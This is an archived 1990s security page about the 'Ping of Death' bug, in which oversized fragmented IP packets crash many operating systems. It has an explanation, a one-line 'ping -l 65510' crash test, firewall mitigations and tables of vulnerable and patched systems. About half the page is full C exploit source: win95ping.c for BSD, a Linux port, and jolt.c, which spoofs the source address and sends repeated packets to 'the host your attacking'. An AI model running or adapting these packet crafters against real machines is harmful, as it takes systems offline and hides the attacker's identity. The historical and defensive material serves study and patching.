Ping of Death

Summary
Description:gazillions of machines can be crashed by sending IP packets that exceed the maximum legal length (65535 octets)
Author:The page included was created by Malachi Kenney. The programs have attribution.
Compromise:Stupid DOS
Vulnerable Systems:I have heard that NT and 95 can actually lock up hard from the programs below. Also, early 2.0.x Linux, Solaris x86, and Macintosh systems are often vulnerable.
Date:21 October 1996 was when this page came up.
Notes:The Ping O' Death page is included first, then comes BSD source code, then comes a version of the above which is modified to compile on Linux 2.X. I also appended jolt.c, which IP spoofs to. Woop!
Details


It's the Ping o' Death Page!

How to crash your operating system!


Maintained by Malachi Kenney, last updated 1/22/97, 1800 GMT
Please mail me with any updates, corrections or new information, being sure to include the word "ping" in the subject line. 

[ From: http://www.sophist.demon.co.uk/ping ]
List of mirror sites
The Ping o'Death diary - new information in the order it's received 

The primary site moved to http://prospect.epresence.com/ping/ on 1/22/97. Great thanks to Mike Bremford, who started this site and
maintained it through the the period of constant updating. 

Javier Romeu of RED Security has done a brilliant job of translating all the pages to Spanish (I have enough trouble maintaining them in
English...). They're available here. 


1. The Problem

In a nutshell, it is possible to crash, reboot or otherwise kill a large number of systems by sending a ping of a certain size from a
remote machine. This is a serious problem, mainly because this can be reproduced very easily, and from a remote machine. (During tests, my
machine in London, England has been crashed from a machine in Berkeley, California), and because the attacker needs to know nothing about
the machine other than its IP address. Be afraid. Since I started this page on the 21st October, over 18 major operating systems have
been found vulnerable. 

It's very easy to exploit - basically, some systems don't like being pinged with a packet greater than 65536 bytes (as opposed to the
default 64 bytes). This bug is not limited to Unix, but is popping up on Macs, Netware, Printers, Routers... the list goes on. Patches are
coming out extremely fast - the award did go to the Linux community for getting a patch out within three hours (well, 2 hours 35 minutes 10
seconds if you must know), but Bill Webb from Telebit assures me that the Netblazer patch was out within two! OK, OK, you can share the
prize money... :-) 

An IP datagram of 65536 bytes is illegal, but possible to create owing to the way the packet is fragmented (broken into chunks for
transmission). When the fragments are reassembled at the other end into a complete packet, it overflows the buffer on some systems, causing
(variously) a reboot, panic, hang, and sometimes even having no effect at all...

Most implementations of ping won't allow an invalid datagram like this to be sent. Among the exceptions are Windows '95 and NT, although
they are certainly not the only ones... 

1.1 A far better explanation of the problem

Thanks to Paul Gortmaker we now have a decent explanation of why this is happening 

Background Information on ICMP ECHO ("ping"):

IP packets as per RFC-791 can be up to 65,535 (2^16-1) octets long, which includes the header length (typically 20 octets if no IP options
are specified). Packets that are bigger than the maximum size the underlyling layer can handle (the MTU) are fragmented into smaller
packets, which are then reassembled by the receiver. For ethernet style devices, the MTU is typically 1500. 

An ICMP ECHO request "lives" inside the IP packet, consisting of eight octets of ICMP header information (RFC-792) followed by the number
of data octets in the "ping" request. Hence the maximum allowable size of the data area is 65535 - 20 - 8 = 65507 octets. 

What causes my machine to crash from this? 

Note that it is possible to send an illegal echo packet with more than 65507 octets of data due to the way the fragmentation is performed.
The fragmentation relies on an offset value in each fragment to determine where the individual fragment goes upon reassembly. Thus on the
last fragment, it is possible to combine a valid offset with a suitable fragment size such that (offset + size) > 65535. Since typical
machines don't process the packet until they have all fragments and have tried to reassemble it, there is the possibility for overflow of
16 bit internal variables, which can lead to system crashes, reboots, kernel dumps and the like. 

1.2 Another twist...

With all this talk of ping, it's easy to miss the root of the problem. Joel Maslak has pointed out that this exploit is by no means
restricted to ping. The problem can be exploited by anything that sends an IP datagram - probably the most fundamental building block of
the net. Not only ICMP echo, but TCP, UDP and (apparently) even new style IPX can be used to hit machines where it hurts.

Bottom line is that blocking ping at the firewall is a temporary fix only. The only solution is to secure the kernel against overflow when
reconstructing IP fragments. (To the best of my knowledge, all of the patches currently available fix the problem). So don't think you're
safe just because you've blocked ping. Damage could be done through NFS, telnet, http... in short, any port your machine listens on is a
target (and maybe even those you don't listen on... anyone?) 

2. How to test if you're vulnerable

Unfortunately, this bug is really easy to exploit. Users are already trying it out "just to see if it worked". So, to test if your machine
is in danger, find a Windows '95 or NT box (3.51 or 4), and run the following command:

ping -l 65510 your.host.ip.address

The message on the '95 box will be "Request Timed Out". This means that the ping wasn't answered, either because the machine is ignoring
you (and rightly so if you're going to send it invalid packets), or because it's dead. It's that simple... 

      Now, courtesy Bill Fenner, those of us without access to '95 or NT can crash machines too - go here for the source code to an evil
      implementation of ping. 
      Apparently, according to Volker Ossenkopf, the ping command on Linux can be rebuilt with a higher package size limit in the ping
      source, and used to whack machines too. Remember, Linux Ping must be run as root. Note - I've tried this and can't make it
      work... Volker did it with Kernel 1.3.84, so maybe things have changed since then 
      I've also been given a pointer by Darren Reed to this package, which is "a generic tool for testing the robustness of IP stacks. It
      includes tests which try to exploit many different problems." It sounds like it would probably identify this ping problem, plus any
      others lurking in your networking code. 
      If you're having trouble reproducing this, try loading the machine up. Although it's hard to tell, it seems that a nearly idle
      machine is more likely to withstand the "Ping O'Death" than one which is busy/swapping/otherwise earning it's living. This is
      possibly due to a memory overflow being more likely to hit something important if the machine is busy... also, I've been told the
      maximum size packet from Windows '95 is 65527, which is 20 bytes over the legal limit. This may produce more spectacular results than
      a 65510 ping. 
      And as an aside... from Nick Bastin...
      Unfortunately, while Irix 6.2 has been patched to keep the 64k ping crash from occuring on its servers, it now has the ability to
      send such a ping, even as a flood...apparently this was some kind of retribution from the programmers so that owners of Irix 5.3
      could kill the people that killed them...<g>

3. How to prevent people from breaking your system

If no patch is available, and your main concern are pings from users outside your network, it would seem the best quick-fix solution is to
block ping at the firewall. This is not a long-term solution. If you have *any* services listening on any ports at all, they are
vulnerable. Be assured that sooner or later someone will come out with a program which sends invalid packets to a web server, an ftp port.
The only solution is to patch your operating system. 

By blocking ping, you prevent people from pinging you at all. This could possibly break some things that rely on ping - I believe that DEC
ObjectBroker uses ping to confirm a connection is still up. Other packages may go too. 

A better solution than blocking all pings is to block only fragmented pings. This will allow your common-or-garden 64 byte ping through on
almost all systems, while blocking any bigger than the MTU size of your link. (This varies, but about 1k is a good bet). 

      Thanks to Alastair Young, we have some information on how to block the evil ping using Firewall-1. Follow this link for details. 

4. The affected systems

This is very much a work in progress. Please, any additional information you come by mail me so I can update this page.
Please include the word "ping" in the subject line 

4.1. Vulnerable operating systems without patches

This includes systems which I haved mixed reports on 
              Operating system
                                                   Version
                                                                    Symptoms
                                                                                                          Comments
 Solaris (x86)
                                              2.4
                                                                 Reboot
                                                                                  Patches are available for 2.5 and 2.5.1, but there are no
                                                                                  patches for 2.4.
 Minix
                                              1.7.4, v2.0 and
                                              probably others
                                                                 Crash
                                                                                  No fix yet
 HP3000 MPE/iX
                                              4.0, 5.0, 5.5
                                                                 System abort
                                                                                  The exact message was "System abort 3890 from subsys
                                                                                  201".
 Convex SPP-UX
                                              All versions
                                                                 Crash
                                                                                  No fix yet, but Convex are working on a patch.
 AOS
                                              ?
                                                                 ?
                                                                                  This is suspected to be vulnerable, based on its BSD 4.3
                                                                                  heritage. However, only one person has been able to crash
                                                                                  it yet, using a 32768 byte packet
 KA9Q OS
                                              ?
                                                                 Crash
                                                                                  No fix yet
 NEXTSTEP
                                              various
                                                                 Platform
                                                                 dependant
                                                                                  Next have tested this, follow the link for more info. The
                                                                                  vulnerability is to a 32768 byte packet
 Apple Mac
                                              MacOs 7.x.x
                                                                 Crash
                                                                                  See the Mac page for details
 Windows 3.11 with Trumpet Winsock
                                              ?
                                                                 Mixed reports
                                                                                  One person has had no problems, another two get network
                                                                                  errors and lose the network connection - the machine had
                                                                                  to be rebooted to restore it
 Windows 3.11 with FTP software PCTCP 4.0,
 Chameleon NFS 5.4, Digital Pathworks stack
 6.0.034 and LINK TCP stack
                                              -
                                                                 Hangs
                                                                                  No fix...
 MSDOS with Lan Workplace
                                              ?
                                                                 Crash
                                                                                  No fix yet
 Novell Netware
                                              3.x
                                                                 Mixed results
                                                                                  Ranging from crash to no effect. 3.11 with TCPIP.NLM
                                                                                  v1.01 hangs the IP stack (IPX/SPX stack is OK), while
                                                                                  3.12 with TCPIP.NLM v2.02 rev 9 is unaffected.
 SCO Open Desktop, Internet FastStart, SCO
 Unix SysV/386
                                              ?
                                                                 Vulnerable
                                                                                  SCO have found this vulnerable. Again, see the CERT
                                                                                  advisory. The problem is network card dependant - at
                                                                                  least the NE2000 and the SMC range are vulnerable
 Windows '95
                                              All of 'em
                                                                 Crash
                                                                                  Once again, the same problem as NT 3.51 and NT 4.0. '95
                                                                                  can be killed quite effectively by sending a large ping
                                                                                  (not receiving). Try the instructions Microsoft have
                                                                                  given for NT 3.51, and remember, your mileage may vary -
                                                                                  a lot of people have no problems


4.2. Vulnerable operating systems with patches

      Operating system
                                      Version
                                                             Symptoms
                                                                                                        Comments
 AIX
                              3 and 4
                                                       Operating system dump.
                                                                              Patch Available! The patch for 3.2.5 has been around for a
                                                                              while, so it may already be applied to your system.
 Linux
                              <= 2.0.23
                                                       Spontaneous reboot or
                                                       kernel panic
                                                                              Patch available!, and supplied here. Kernel 2.0.24 is out,
                                                                              which fixes this. Upgrade now!
 Linux
                              1.2.13
                                                       Reboot, Hang or No
                                                       effect
                                                                              Patch available!, although this one hasn't been tested.
                                                                              Supplied here
 DEC Unix/OSF1
                              2.0 and above
                                                       Kernel Panic
                                                                              Patch available! and supplied here
 OpenVMS for AXP
                              various
                                                       Mixed reports
                                                                              Patch really is available!, as of 15th November (so I've
                                                                              been told). Follow the yellow brick link 
 OpenVMS for VAX
                              v6.2, UCX v4.0 and
                              others
                                                       Reboot
                                                                              It turns out the the one person who managed to crash this was
                                                                              right... OpenVMS for VAX is vulnerable, as DEC have found
                                                                              out. I haven't got any information on this, other than that
                                                                              the vulnerablity is presumably the same as for DEC Ultrix,
                                                                              and that more information can be gained from the CERT
                                                                              Advisory or the Ultrix page linked in column one
 HP-UX
                              9.0 to 10.20
                                                       Crash, Reboot, Hang...
                                                                              Patch available!, follow the link... (it works too...).
                                                                              See also CIAC F-04 for the same information, just officially
 Windows NT
                              3.5.1
                                                       Mixed results
                                                                              The latest word is Microsoft have acknowledged the problem
                                                                              and have released a patch (it seems that sending a bad ping
                                                                              can make NT do some funny things!). Some info just in is that
                                                                              if you do as M*soft says (ping -l 65510 -s 1 ip.address) you
                                                                              can crash NT 3.51. So maybe it is vulnerable after all.
 Galacticomm Worldgroup
 BBS/Terminal Server 
                              1.0, 2.0
                                                       General Protection
                                                       Fault
                                                                              Yup, this has been fixed too. Patches available for v1 and
                                                                              v2, with version v3 being ping proof. Follow the ol'
                                                                              hyperlink for the scoop. Note that this problem only affects
                                                                              the Galacticomm TCP/IP stack - the Vircom MajorTCP/IP stack
                                                                              is not vulnerable
 MkLinux
                              ?
                                                       Crash
                                                                              There is a guide available on upgrading your kernel to
                                                                              2.0.27, which will fix the problem
 Unisys A series
                              TCP/IP pre 32.4 release
                                                       Crash
                                                                              Unisys have informed me that this problem is corrected in the
                                                                              32.4 and higher A series TCP/IP product. I'm assuming that an
                                                                              upgrade will correct it
 Convex OS
                              All versions
                                                       Crash
                                                                              Patch available! Contact the TAC
 Solaris (x86)
                              2.5, 2.5.1a





-BSD ping program:

*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum).  That means that SunOS, Solaris, and
 * BSD4.3-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
 * 
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

int
main(int argc, char **argv)
{
        int s;
        char buf[1500];
        struct ip *ip = (struct ip *)buf;
        struct icmp *icmp = (struct icmp *)(ip + 1);
        struct hostent *hp;
        struct sockaddr_in dst;
        int offset;
        int on = 1;

        bzero(buf, sizeof buf);

        if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if (argc != 2) {
                fprintf(stderr, "usage: %s hostname\n", argv[0]);
                exit(1);
        }
        if ((hp = gethostbyname(argv[1])) == NULL) {
                if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[1]);
                }
        } else {
                bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }
        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = FIX(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = FIX(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_sum = 0;                 /* kernel fills in */
        ip->ip_src.s_addr = 0;          /* kernel fills in */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->icmp_type = ICMP_ECHO;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */

        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
                ip->ip_off = FIX(offset >> 3);
                if (offset < 65120)
                        ip->ip_off |= FIX(IP_MF);
                else
                        ip->ip_len = FIX(418);  /* make total 65538 */
                if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: ", offset);
                        perror("sendto");
                }
                if (offset == 0) {
                        icmp->icmp_type = 0;
                        icmp->icmp_code = 0;
                        icmp->icmp_cksum = 0;
                }
        }
}


--Linux modification:

/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
 * version 1.01 Mike Bremford <Mike.Bremford@bl.uk> patched for Linux
 * version 1.02 Barak Pearlmutter <bap@sloan.salk.edu> clean compile
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum).  That means that SunOS, Solaris, and
 * BSD4.3-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
 * 
 */
#ifdef LINUX
#define REALLY_RAW
#define __BSD_SOURCE
#ifndef IP_MF
#define IP_MF           0x2000
#define IP_DF           0x4000
#define IP_CE           0x8000
#define IP_OFFSET       0x1FFF
#endif
#endif

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif


int
main(int argc, char **argv)
{
        int s;
        char buf[1500];
        struct ip *ip = (struct ip *)buf;
#ifdef LINUX
        struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
#else
        struct icmp *icmp = (struct icmp *)(ip + 1);
#endif
        struct hostent *hp;
        struct sockaddr_in dst;
        int offset;
        int on = 1;

        bzero(buf, sizeof buf);

        if ((s = socket(AF_INET, SOCK_RAW,
#ifdef LINUX
        IPPROTO_ICMP
#else
        IPPROTO_IP
#endif
        )) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if (argc != 2) {
                fprintf(stderr, "usage: %s hostname\n", argv[0]);
                exit(1);
        }
        if ((hp = gethostbyname(argv[1])) == NULL) {
                if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[1]);
                        exit(1);
                }
        } else {
                bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }
        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = FIX(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = FIX(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
#ifdef LINUX    
        ip->ip_csum = 0;                 /* kernel fills in */
#else
        ip->ip_sum = 0;                 /* kernel fills in */
#endif
        ip->ip_src.s_addr = 0;          /* kernel fills in */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

#ifdef LINUX
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#else
        icmp->icmp_type = ICMP_ECHO;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#endif

        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
                ip->ip_off = FIX(offset >> 3);
                if (offset < 65120)
                        ip->ip_off |= FIX(IP_MF);
                else
                        ip->ip_len = FIX(418);  /* make total 65538 */
                if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: ", offset);
                        perror("sendto");
                }
                if (offset == 0) {
#ifdef LINUX
                        icmp->type = 0;
                        icmp->code = 0;
                        icmp->checksum = 0;
#else
                        icmp->icmp_type = 0;
                        icmp->icmp_code = 0;
                        icmp->icmp_cksum = 0;
#endif
                }
        }
        return 0;
}

--Here is jolt.c:

        /* Jolt
        1.0 (c) 1997 by Jeff w. Roberson
        * Please, if you use my code give me credit. Also, if i
        was the first to
        * find this glitch, please give me credit. Thats all i
        ask.
        *
        * Ok so all this does is build a really fraggmented over
        sized packet
        * and once win95 gets it, and puts it back together it
        locks. I send
        * multiple packets by default cause some times it takes a
        few packets to
        * totally freeze the host. Maybe its spending processor
        time to figure
        * out how to put them back together? I've had reports of
        people blue
        * screening from it tho so we'll let Microsoft's boys
        figure out exactly
        * what this does to 95. As of now i haven't tested it on
        NT, but maybe
        * i will later ;). All of this source wasn't origonally
        written by me
        * I just took one of the old programs to kill POSIX and
        SYSV based
        * systems and worked on it abit, then made it spoof =). 
        * VallaH (yaway@hotmail.com)
        *
        * Update: It apears to work on some older versions of mac
        os
        */
        
        /* Yah this is for linux, but i like the BSD ip header
        better then linux's */
        #define __BSD_SOURCE
        #include <stdio.h>
        #include <sys/types.h>
        #include <sys/socket.h>
        #include <netdb.h>
        #include <netinet/in.h>
        #include <netinet/in_systm.h>
        #include <netinet/ip.h>
        #include <netinet/ip_icmp.h>
        #include <string.h>
        #include <arpa/inet.h>
        
        int main(int argc, char **argv)
        {
        int s,i;
        char buf[400];
        struct ip *ip = (struct ip *)buf;
        struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
        struct hostent *hp, *hp2;
        struct sockaddr_in dst;
        int offset;
        int on;
        int num = 5;
        
        if (argc < 3) {
        printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!)
        glitch by VallaH (yaway@hotmail.com)\n");
        printf("\nusage: %s <dstaddr> <saddr>
        [number]\n",argv[0]);
        printf("\tdstaddr is the host your
        attacking\n");
        printf("\tsaddr is the host your spoofing
        from\n");
        printf("\tNumber is the number of packets to send, 5
        is the default\n");
        printf("\nNOTE: This is based on a bug that used to
        affect POSIX complient, and SYSV \n\t systems so its
        nothing new..\n");
        printf("\nGreets to Bill Gates! How do ya like this
        one? :-)\n");
        exit(1);
        }
        if (argc == 4) num = atoi(argv[3]);
        for (i=1;i<=num;i++) {
        on=1;
        bzero(buf, sizeof buf);
        
        if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0)
        {
        perror("socket");
        exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on,
        sizeof(on)) < 0) {
        perror("IP_HDRINCL");
        exit(1);
        }
        
        if ((hp = gethostbyname(argv[1])) == NULL) {
        if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
        fprintf(stderr, "%s: unknown host\n", argv[1]);
        exit(1);
        }
        } else {
        bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr,
        hp->h_length);
        }
        
        if ((hp2 = gethostbyname(argv[2])) == NULL) {
        if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
        fprintf(stderr, "%s: unknown host\n", argv[2]);
        exit(1);
        }
        } else {
        bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr,
        hp->h_length);
        }
        
        printf("Sending to %s\n",
        inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = htons(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_csum = 0; /* kernel fills in */
        
        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;
        
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
        for (offset = 0; offset < 65536; offset += (sizeof buf
        - sizeof *ip)) {
        ip->ip_off = htons(offset >> 3);
        if (offset < 65120)
        ip->ip_off |= htons(0x2000);
        else
        ip->ip_len = htons(418); /* make total 65538 */
        if (sendto(s, buf, sizeof buf, 0, (struct sockaddr
        *)&dst,
        sizeof dst) < 0) {
        fprintf(stderr, "offset %d: ", offset);
        perror("sendto");
        }
        if (offset == 0) {
        icmp->type = 0;
        icmp->code = 0;
        icmp->checksum = 0;
        }
        }
        close(s);
        usleep(30000);
        }
        return 0;
        }
        

}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]